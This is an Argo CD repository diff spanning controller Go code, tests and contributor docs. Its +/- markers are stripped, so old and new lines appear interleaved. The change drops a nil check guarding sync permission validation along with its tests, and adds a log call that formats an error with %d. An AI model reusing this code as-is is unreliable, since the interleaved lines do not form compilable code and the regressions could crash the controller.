// - newStatus *v1alpha1.SourceHydratorStatus
func (_e *Dependencies_Expecter) PersistHydrationStatus(orig interface{}, newStatus interface{}) *Dependencies_PersistHydrationStatus_Call {
return &Dependencies_PersistHydrationStatus_Call{Call: _e.mock.On("PersistHydrationStatus", orig, newStatus)}
func (_e *Dependencies_Expecter) PersistAppHydratorStatus(orig interface{}, newStatus interface{}) *Dependencies_PersistAppHydratorStatus_Call {
return &Dependencies_PersistAppHydratorStatus_Call{Call: _e.mock.On("PersistAppHydratorStatus", orig, newStatus)}
}
func (_c *Dependencies_PersistHydrationStatus_Call) Run(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistHydrationStatus_Call {
func (_c *Dependencies_PersistAppHydratorStatus_Call) Run(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistAppHydratorStatus_Call {
_c.Call.Run(func(args mock.Arguments) {
var arg0 *v1alpha1.Application
if args[0] != nil {
@@ -561,12 +561,12 @@ func (_c *Dependencies_PersistHydrationStatus_Call) Run(run func(orig *v1alpha1.
return _c
}
func (_c *Dependencies_PersistHydrationStatus_Call) Return() *Dependencies_PersistHydrationStatus_Call {
func (_c *Dependencies_PersistAppHydratorStatus_Call) Return() *Dependencies_PersistAppHydratorStatus_Call {
_c.Call.Return()
return _c
}
func (_c *Dependencies_PersistHydrationStatus_Call) RunAndReturn(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistHydrationStatus_Call {
func (_c *Dependencies_PersistAppHydratorStatus_Call) RunAndReturn(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistAppHydratorStatus_Call {
_c.Run(run)
return _c
}


@@ -3,7 +3,6 @@ package controller
import (
"context"
"fmt"
"maps"
"github.com/argoproj/argo-cd/v3/controller/hydrator/types"
appv1 "github.com/argoproj/argo-cd/v3/pkg/apis/application/v1alpha1"
@@ -89,13 +88,10 @@ func (ctrl *ApplicationController) RequestAppRefresh(appName string, appNamespac
return nil
}
func (ctrl *ApplicationController) PersistHydrationStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus) {
newAnnotations := make(map[string]string)
maps.Copy(newAnnotations, orig.GetAnnotations())
delete(newAnnotations, appv1.AnnotationKeyHydrate)
func (ctrl *ApplicationController) PersistAppHydratorStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus) {
status := orig.Status.DeepCopy()
status.SourceHydrator = *newStatus
ctrl.persistAppStatus(orig, status, newAnnotations)
ctrl.persistAppStatus(orig, status)
}
func (ctrl *ApplicationController) AddHydrationQueueItem(key types.HydrationQueueKey) {


@@ -222,10 +222,7 @@ func createConsistentHashingWithBoundLoads(replicas int, getCluster clusterAcces
}
shardIndexedByCluster[c.ID], err = strconv.Atoi(clusterIndex)
if err != nil {
log.Errorf("Failed to get shard index from consistent hashing, error=%v", err)
// No continue here: strconv.Atoi returns 0 on failure, so the cluster falls back to shard 0.
// This is intentional since shard 0 always exists (replicas > 0 is enforced by the caller),
// so the cluster remains reconciled rather than being silently dropped.
log.Errorf("Consistent Hashing was supposed to return a shard index but it returned %d", err)
}
numApps, ok := appDistribution[c.Server]
if !ok {
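The fallback noted in the comment above relies on `strconv.Atoi` returning the int zero value together with its error. A small standalone illustration (`shardIndex` is a hypothetical wrapper, not the controller's code):

```go
package main

import (
	"fmt"
	"strconv"
)

// shardIndex parses the index produced by the consistent-hashing lookup.
// strconv.Atoi returns the int zero value alongside any error, so on a bad
// input the cluster falls back to shard 0 instead of being dropped.
func shardIndex(raw string) int {
	idx, err := strconv.Atoi(raw)
	if err != nil {
		// Log and keep the zero-value shard, which always exists
		// when replicas > 0.
		fmt.Printf("failed to parse shard index %q: %v\n", raw, err)
	}
	return idx
}

func main() {
	fmt.Println(shardIndex("3"))            // 3
	fmt.Println(shardIndex("not-a-number")) // falls back to 0
}
```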


@@ -847,10 +847,9 @@ func (m *appStateManager) CompareAppState(app *v1alpha1.Application, project *v1
if err != nil {
log.Errorf("CompareAppState error getting server side diff dry run applier: %s", err)
conditions = append(conditions, v1alpha1.ApplicationCondition{Type: v1alpha1.ApplicationConditionUnknownError, Message: err.Error(), LastTransitionTime: &now})
} else {
defer cleanup()
diffConfigBuilder.WithServerSideDryRunner(diff.NewK8sServerSideDryRunner(applier))
}
defer cleanup()
diffConfigBuilder.WithServerSideDryRunner(diff.NewK8sServerSideDryRunner(applier))
}
// enable structured merge diff if application syncs with server-side apply
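The hunk above moves `defer cleanup()` into the success branch. A standalone sketch of why that matters, using stand-in names (`getApplier` and `run` are hypothetical, not the repo's functions):

```go
package main

import (
	"errors"
	"fmt"
)

// getApplier stands in for the dry-run applier constructor: on failure it
// returns a nil cleanup func, which must never be deferred.
func getApplier(fail bool) (cleanup func(), err error) {
	if fail {
		return nil, errors.New("connection refused")
	}
	return func() { fmt.Println("cleaned up") }, nil
}

func run(fail bool) error {
	cleanup, err := getApplier(fail)
	if err != nil {
		// Record the failure and skip the dry runner entirely.
		return err
	}
	// Deferring only after the error check avoids invoking a nil func at
	// function exit, which would panic.
	defer cleanup()
	fmt.Println("configured server-side dry runner")
	return nil
}

func main() {
	fmt.Println(run(true))  // connection refused
	fmt.Println(run(false)) // <nil>
}
```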


@@ -6,6 +6,7 @@ import (
"fmt"
"os"
"strconv"
"strings"
"time"
"k8s.io/apimachinery/pkg/util/strategicpatch"
@@ -32,16 +33,20 @@ import (
applog "github.com/argoproj/argo-cd/v3/util/app/log"
"github.com/argoproj/argo-cd/v3/util/argo"
"github.com/argoproj/argo-cd/v3/util/argo/diff"
"github.com/argoproj/argo-cd/v3/util/glob"
kubeutil "github.com/argoproj/argo-cd/v3/util/kube"
logutils "github.com/argoproj/argo-cd/v3/util/log"
"github.com/argoproj/argo-cd/v3/util/lua"
"github.com/argoproj/argo-cd/v3/util/settings"
)
const (
// EnvVarSyncWaveDelay is an environment variable which controls the delay in seconds between
// each sync-wave
EnvVarSyncWaveDelay = "ARGOCD_SYNC_WAVE_DELAY"
// serviceAccountDisallowedCharSet contains the characters that are not allowed to be present
// in a DefaultServiceAccount configured for a DestinationServiceAccount
serviceAccountDisallowedCharSet = "!*[]{}\\/"
)
func (m *appStateManager) getOpenAPISchema(server *v1alpha1.Cluster) (openapi.Resources, error) {
@@ -283,7 +288,7 @@ func (m *appStateManager) SyncAppState(app *v1alpha1.Application, project *v1alp
return
}
if impersonationEnabled {
serviceAccountToImpersonate, err := settings.DeriveServiceAccountToImpersonate(project, app, destCluster)
serviceAccountToImpersonate, err := deriveServiceAccountToImpersonate(project, app, destCluster)
if err != nil {
state.Phase = common.OperationError
state.Message = fmt.Sprintf("failed to find a matching service account to impersonate: %v", err)
@@ -303,9 +308,22 @@ func (m *appStateManager) SyncAppState(app *v1alpha1.Application, project *v1alp
sync.WithLogr(logutils.NewLogrusLogger(logEntry)),
sync.WithHealthOverride(lua.ResourceHealthOverrides(resourceOverrides)),
sync.WithPermissionValidator(func(un *unstructured.Unstructured, res *metav1.APIResource) error {
return validateSyncPermissions(project, destCluster, func(proj string) ([]*v1alpha1.Cluster, error) {
return m.db.GetProjectClusters(context.TODO(), proj)
}, un, res)
if !project.IsGroupKindNamePermitted(un.GroupVersionKind().GroupKind(), un.GetName(), res.Namespaced) {
return fmt.Errorf("resource %s:%s is not permitted in project %s", un.GroupVersionKind().Group, un.GroupVersionKind().Kind, project.Name)
}
if res.Namespaced {
permitted, err := project.IsDestinationPermitted(destCluster, un.GetNamespace(), func(project string) ([]*v1alpha1.Cluster, error) {
return m.db.GetProjectClusters(context.TODO(), project)
})
if err != nil {
return err
}
if !permitted {
return fmt.Errorf("namespace %v is not permitted in project '%s'", un.GetNamespace(), project.Name)
}
}
return nil
}),
sync.WithOperationSettings(syncOp.DryRun, syncOp.Prune, syncOp.SyncStrategy.Force(), syncOp.IsApplyStrategy() || len(syncOp.Resources) > 0),
sync.WithInitialState(state.Phase, state.Message, initialResourcesRes, state.StartedAt),
@@ -553,32 +571,37 @@ func syncWindowPreventsSync(app *v1alpha1.Application, proj *v1alpha1.AppProject
return !canSync, nil
}
// validateSyncPermissions checks whether the given resource is permitted by the project's
// allow/deny lists and destination rules. It returns an error if the API resource info is nil
// (preventing a nil-pointer panic), if the resource's group/kind is not permitted, or if
// the resource's namespace is not an allowed destination.
func validateSyncPermissions(
project *v1alpha1.AppProject,
destCluster *v1alpha1.Cluster,
getProjectClusters func(string) ([]*v1alpha1.Cluster, error),
un *unstructured.Unstructured,
res *metav1.APIResource,
) error {
if res == nil {
return fmt.Errorf("failed to get API resource info for %s/%s: unable to verify permissions", un.GroupVersionKind().Group, un.GroupVersionKind().Kind)
// deriveServiceAccountToImpersonate determines the service account to be used for impersonation for the sync operation.
// The returned service account will be fully qualified including namespace and the service account name in the format system:serviceaccount:<namespace>:<service_account>
func deriveServiceAccountToImpersonate(project *v1alpha1.AppProject, application *v1alpha1.Application, destCluster *v1alpha1.Cluster) (string, error) {
// spec.Destination.Namespace is optional. If not specified, use the Application's
// namespace
serviceAccountNamespace := application.Spec.Destination.Namespace
if serviceAccountNamespace == "" {
serviceAccountNamespace = application.Namespace
}
if !project.IsGroupKindNamePermitted(un.GroupVersionKind().GroupKind(), un.GetName(), res.Namespaced) {
return fmt.Errorf("resource %s:%s is not permitted in project %s", un.GroupVersionKind().Group, un.GroupVersionKind().Kind, project.Name)
}
if res.Namespaced {
permitted, err := project.IsDestinationPermitted(destCluster, un.GetNamespace(), getProjectClusters)
// Loop through the destinationServiceAccounts and see if there is any destination that is a candidate.
// if so, return the service account specified for that destination.
for _, item := range project.Spec.DestinationServiceAccounts {
dstServerMatched, err := glob.MatchWithError(item.Server, destCluster.Server)
if err != nil {
return err
return "", fmt.Errorf("invalid glob pattern for destination server: %w", err)
}
if !permitted {
return fmt.Errorf("namespace %v is not permitted in project '%s'", un.GetNamespace(), project.Name)
dstNamespaceMatched, err := glob.MatchWithError(item.Namespace, application.Spec.Destination.Namespace)
if err != nil {
return "", fmt.Errorf("invalid glob pattern for destination namespace: %w", err)
}
if dstServerMatched && dstNamespaceMatched {
if strings.Trim(item.DefaultServiceAccount, " ") == "" || strings.ContainsAny(item.DefaultServiceAccount, serviceAccountDisallowedCharSet) {
return "", fmt.Errorf("default service account contains invalid chars '%s'", item.DefaultServiceAccount)
} else if strings.Contains(item.DefaultServiceAccount, ":") {
// service account is specified along with its namespace.
return "system:serviceaccount:" + item.DefaultServiceAccount, nil
}
// service account needs to be prefixed with a namespace
return fmt.Sprintf("system:serviceaccount:%s:%s", serviceAccountNamespace, item.DefaultServiceAccount), nil
}
}
return nil
// if there is no match found in AppProject.Spec.DestinationServiceAccounts, return an error rather than falling back to a default service account.
return "", fmt.Errorf("no matching service account found for destination server %s and namespace %s", application.Spec.Destination.Server, serviceAccountNamespace)
}
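The qualification rule described in the comments above can be sketched in isolation. `qualifyServiceAccount` is a hypothetical helper that mirrors only the naming logic of `deriveServiceAccountToImpersonate`, not its glob matching or validation:

```go
package main

import (
	"fmt"
	"strings"
)

// qualifyServiceAccount mirrors the naming rule: a DefaultServiceAccount that
// already contains ':' is treated as "<namespace>:<name>" and used as-is;
// otherwise the destination namespace is prepended.
func qualifyServiceAccount(defaultSA, namespace string) string {
	if strings.Contains(defaultSA, ":") {
		// service account is specified along with its namespace
		return "system:serviceaccount:" + defaultSA
	}
	return fmt.Sprintf("system:serviceaccount:%s:%s", namespace, defaultSA)
}

func main() {
	fmt.Println(qualifyServiceAccount("deployer", "guestbook"))       // system:serviceaccount:guestbook:deployer
	fmt.Println(qualifyServiceAccount("tools:deployer", "guestbook")) // system:serviceaccount:tools:deployer
}
```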


@@ -13,7 +13,6 @@ import (
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"github.com/argoproj/argo-cd/v3/common"
"github.com/argoproj/argo-cd/v3/controller/testdata"
@@ -22,7 +21,6 @@ import (
"github.com/argoproj/argo-cd/v3/test"
"github.com/argoproj/argo-cd/v3/util/argo/diff"
"github.com/argoproj/argo-cd/v3/util/argo/normalizers"
"github.com/argoproj/argo-cd/v3/util/settings"
)
func TestPersistRevisionHistory(t *testing.T) {
@@ -727,7 +725,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should be an error saying no valid match was found
@@ -751,7 +749,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be no error and should use the right service account for impersonation
require.NoError(t, err)
@@ -790,7 +788,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be no error and should use the right service account for impersonation
require.NoError(t, err)
@@ -829,7 +827,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be no error and it should use the first matching service account for impersonation
require.NoError(t, err)
@@ -863,7 +861,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and should use the first matching glob pattern service account for impersonation
require.NoError(t, err)
@@ -898,7 +896,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be an error saying no match was found
require.EqualError(t, err, expectedErrMsg)
@@ -926,7 +924,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the service account configured with an empty namespace should be used.
require.NoError(t, err)
@@ -960,7 +958,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the catch all service account should be returned
require.NoError(t, err)
@@ -984,7 +982,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there must be an error as the glob pattern is invalid.
require.ErrorContains(t, err, "invalid glob pattern for destination namespace")
@@ -1018,7 +1016,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account with its namespace should be returned.
@@ -1046,7 +1044,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f.application.Spec.Destination.Name = f.cluster.Name
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account with its namespace should be returned.
@@ -1129,7 +1127,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the right service account must be returned.
require.NoError(t, err)
@@ -1168,7 +1166,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and first matching service account should be used
require.NoError(t, err)
@@ -1202,7 +1200,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account of the glob pattern, being the first match should be returned.
@@ -1237,7 +1235,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
// then, an error with an appropriate message must be returned
require.EqualError(t, err, expectedErr)
@@ -1271,7 +1269,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the service account of the glob pattern match must be returned.
require.NoError(t, err)
@@ -1295,7 +1293,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there must be an error as the glob pattern is invalid.
require.ErrorContains(t, err, "invalid glob pattern for destination server")
@@ -1329,7 +1327,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
// then, there should not be any error and the service account with the given namespace prefix must be returned.
require.NoError(t, err)
@@ -1357,7 +1355,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f.application.Spec.Destination.Name = f.cluster.Name
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account with its namespace should be returned.
@@ -1655,116 +1653,3 @@ func dig(obj any, path ...any) any {
return i
}
func TestValidateSyncPermissions(t *testing.T) {
t.Parallel()
newResource := func(group, kind, name, namespace string) *unstructured.Unstructured {
obj := &unstructured.Unstructured{}
obj.SetGroupVersionKind(schema.GroupVersionKind{Group: group, Version: "v1", Kind: kind})
obj.SetName(name)
obj.SetNamespace(namespace)
return obj
}
project := &v1alpha1.AppProject{
ObjectMeta: metav1.ObjectMeta{
Name: "test-project",
Namespace: "argocd",
},
Spec: v1alpha1.AppProjectSpec{
Destinations: []v1alpha1.ApplicationDestination{
{Namespace: "default", Server: "*"},
},
},
}
destCluster := &v1alpha1.Cluster{
Server: "https://kubernetes.default.svc",
}
noopGetClusters := func(_ string) ([]*v1alpha1.Cluster, error) {
return nil, nil
}
t.Run("nil APIResource returns error", func(t *testing.T) {
t.Parallel()
un := newResource("apps", "Deployment", "my-deploy", "default")
err := validateSyncPermissions(project, destCluster, noopGetClusters, un, nil)
require.Error(t, err)
assert.Contains(t, err.Error(), "failed to get API resource info for apps/Deployment")
assert.Contains(t, err.Error(), "unable to verify permissions")
})
t.Run("permitted namespaced resource returns no error", func(t *testing.T) {
t.Parallel()
un := newResource("", "ConfigMap", "my-cm", "default")
res := &metav1.APIResource{Name: "configmaps", Namespaced: true}
err := validateSyncPermissions(project, destCluster, noopGetClusters, un, res)
assert.NoError(t, err)
})
t.Run("group kind not permitted returns error", func(t *testing.T) {
t.Parallel()
projectWithDenyList := &v1alpha1.AppProject{
ObjectMeta: metav1.ObjectMeta{
Name: "restricted-project",
Namespace: "argocd",
},
Spec: v1alpha1.AppProjectSpec{
Destinations: []v1alpha1.ApplicationDestination{
{Namespace: "*", Server: "*"},
},
ClusterResourceBlacklist: []v1alpha1.ClusterResourceRestrictionItem{
{Group: "rbac.authorization.k8s.io", Kind: "ClusterRole"},
},
},
}
un := newResource("rbac.authorization.k8s.io", "ClusterRole", "my-role", "")
res := &metav1.APIResource{Name: "clusterroles", Namespaced: false}
err := validateSyncPermissions(projectWithDenyList, destCluster, noopGetClusters, un, res)
require.Error(t, err)
assert.Contains(t, err.Error(), "is not permitted in project")
})
t.Run("namespace not permitted returns error", func(t *testing.T) {
t.Parallel()
un := newResource("", "ConfigMap", "my-cm", "kube-system")
res := &metav1.APIResource{Name: "configmaps", Namespaced: true}
err := validateSyncPermissions(project, destCluster, noopGetClusters, un, res)
require.Error(t, err)
assert.Contains(t, err.Error(), "namespace kube-system is not permitted in project")
})
t.Run("cluster-scoped resource skips namespace check", func(t *testing.T) {
t.Parallel()
projectWithClusterResources := &v1alpha1.AppProject{
ObjectMeta: metav1.ObjectMeta{
Name: "test-project",
Namespace: "argocd",
},
Spec: v1alpha1.AppProjectSpec{
Destinations: []v1alpha1.ApplicationDestination{
{Namespace: "default", Server: "*"},
},
ClusterResourceWhitelist: []v1alpha1.ClusterResourceRestrictionItem{
{Group: "*", Kind: "*"},
},
},
}
un := newResource("", "Namespace", "my-ns", "")
res := &metav1.APIResource{Name: "namespaces", Namespaced: false}
err := validateSyncPermissions(projectWithClusterResources, destCluster, noopGetClusters, un, res)
assert.NoError(t, err)
})
}

(Binary image file changed; diff not shown. Before: 23 MiB, after: 3.0 MiB.)

View File

@@ -38,23 +38,23 @@ and others. Although you can make changes to these files and run them locally, i
1. Fork and clone the [Argo UI repository](https://github.com/argoproj/argo-ui).
2. `cd` into your `argo-ui` directory, and then run `pnpm install`.
2. `cd` into your `argo-ui` directory, and then run `yarn install`.
3. Make your file changes.
4. Run `pnpm start` to start a [storybook](https://storybook.js.org/) dev server and view the components in your browser. Make sure all your changes work as expected.
4. Run `yarn start` to start a [storybook](https://storybook.js.org/) dev server and view the components in your browser. Make sure all your changes work as expected.
5. Use [pnpm link](https://pnpm.io/cli/link) to link Argo UI package to your Argo CD repository. (Commands below assume that `argo-ui` and `argo-cd` are both located within the same parent folder)
5. Use [yarn link](https://classic.yarnpkg.com/en/docs/cli/link/) to link Argo UI package to your Argo CD repository. (Commands below assume that `argo-ui` and `argo-cd` are both located within the same parent folder)
* `cd argo-ui`
* `pnpm link`
* `yarn link`
* `cd ../argo-cd/ui`
* `pnpm link argo-ui`
* `yarn link argo-ui`
Once the `argo-ui` package has been successfully linked, test changes in your local development environment.
6. Commit changes and open a PR to [Argo UI](https://github.com/argoproj/argo-ui).
7. Once your PR has been merged in Argo UI, `cd` into your `argo-cd/ui` folder and run `pnpm add git+https://github.com/argoproj/argo-ui.git`. This will update the commit SHA in the `ui/pnpm-lock.yaml` file to use the latest master commit for argo-ui.
7. Once your PR has been merged in Argo UI, `cd` into your `argo-cd/ui` folder and run `yarn add git+https://github.com/argoproj/argo-ui.git`. This will update the commit SHA in the `ui/yarn.lock` file to use the latest master commit for argo-ui.
8. Submit changes to `ui/pnpm-lock.yaml` in a PR to Argo CD.
8. Submit changes to `ui/yarn.lock` in a PR to Argo CD.


@@ -60,7 +60,7 @@ The Linter might make some automatic changes to your code, such as indentation f
* Finally, after the Linter reports no errors, run `git status` or `git diff` to check for any changes made automatically by Lint
* If there were automatic changes, commit them to your local branch
If you touched UI code, you should also run the linter on it:
If you touched UI code, you should also run the Yarn linter on it:
* Run `make lint-ui` or `make lint-ui-local`
* Fix any of the errors reported by it


@@ -21,8 +21,8 @@ These are the upcoming releases dates:
| v3.1 | Monday, Jun. 16, 2025 | Monday, Aug. 4, 2025 | [Christian Hernandez](https://github.com/christianh814) | [Alexandre Gaudreault](https://github.com/agaudreault) | [checklist](https://github.com/argoproj/argo-cd/issues/23347) |
| v3.2 | Monday, Sep. 15, 2025 | Monday, Nov. 3, 2025 | [Nitish Kumar](https://github.com/nitishfy) | [Michael Crenshaw](https://github.com/crenshaw-dev) | [checklist](https://github.com/argoproj/argo-cd/issues/24539) |
| v3.3 | Monday, Dec. 15, 2025 | Monday, Feb. 2, 2026 | [Peter Jiang](https://github.com/pjiang-dev) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/25211) |
| v3.4 | Monday, Mar. 16, 2026 | Tuesday, May. 5, 2026 | [Codey Jenkins](https://github.com/FourFifthsCode) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26527) |
| v3.5 | Tuesday, Jun. 16, 2026 | Tuesday, Aug. 4, 2026 | [Patroklos Papapetrou](https://github.com/ppapapetrou76) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26746) |
| v3.4 | Monday, Mar. 16, 2026 | Monday, May. 4, 2026 | [Codey Jenkins](https://github.com/FourFifthsCode) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26527) |
| v3.5 | Monday, Jun. 15, 2026 | Monday, Aug. 3, 2026 | [Patroklos Papapetrou](https://github.com/ppapapetrou76) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26746) |
Actual release dates might differ from the plan by a few days.
@@ -36,10 +36,10 @@ effectively means that there is a seven-week feature freeze.
These are the approximate release dates:
* The first Tuesday of February
* The first Tuesday of May
* The first Tuesday of August
* The first Tuesday of November
* The first Monday of February
* The first Monday of May
* The first Monday of August
* The first Monday of November
Dates may be shifted slightly to accommodate holidays. Those shifts should be minimal.


@@ -98,15 +98,11 @@ checks to see if the release came out correctly:
### If something went wrong
A new Argo CD release results in:
- A new GitHub release
- A stable Git tag pointing to the release (if the release is the latest release)
- Published Go packages so Argo CD code can be used as a dependency
- Published Docker images and SBOM artifacts
If something went wrong, damage should be limited. Depending on the steps that
have been performed, you will need to manually clean up.
Because of all the above dependencies, if a release failed, it is not safe to delete and recreate it.
Instead, create the next patch release (for example, if `3.2.4` failed, create `3.2.5` after fixing the problem, but don't recreate `3.2.4`).
Upon successful publishing of the fixed release (3.2.5 in our example), manually copy the full release notes from the failed release (3.2.4), then update the failed release's notes to state that the release is invalid and should not be used.
* If the container image has been pushed to Quay.io, delete it
* Delete the release (if created) from the `Releases` page on GitHub
### Manual releasing


@@ -1,8 +1,7 @@
# Submitting PRs
## Prerequisites
1. [Development Environment](development-environment.md)
1. [Development Environment](development-environment.md)
2. [Toolchain Guide](toolchain-guide.md)
3. [Development Cycle](development-cycle.md)
@@ -22,10 +21,10 @@ If you need guidance with submitting a PR, or have any other questions regarding
## Before Submitting a PR
1. Rebase your branch against upstream master:
1. Rebase your branch against upstream main:
```shell
git fetch upstream
git rebase upstream/master
git rebase upstream/main
```
2. Run pre-commit checks:


@@ -45,7 +45,7 @@ The Makefile's `start-e2e` target starts instances of ArgoCD on your local machi
- `ARGOCD_E2E_REPOSERVER_PORT`: Listener port for `argocd-reposerver` (default: `8081`)
- `ARGOCD_E2E_DEX_PORT`: Listener port for `dex` (default: `5556`)
- `ARGOCD_E2E_REDIS_PORT`: Listener port for `redis` (default: `6379`)
- `ARGOCD_E2E_PNPM_CMD`: Command to use for starting the UI via pnpm (default: `pnpm`)
- `ARGOCD_E2E_YARN_CMD`: Command to use for starting the UI via Yarn (default: `yarn`)
- `ARGOCD_E2E_DIR`: Local path to the repository to use for ephemeral test data
If you have changed the port for `argocd-server`, be sure to also set the `ARGOCD_SERVER` environment variable to point to that port, e.g. `export ARGOCD_SERVER=localhost:8888` before running `make test-e2e`, so that the tests communicate with the correct server component.


@@ -117,9 +117,9 @@ you should edit your `~/.kube/config` and modify the `server` option to point to
<https://nodejs.org/en/download>
#### Install `pnpm`
#### Install `yarn`
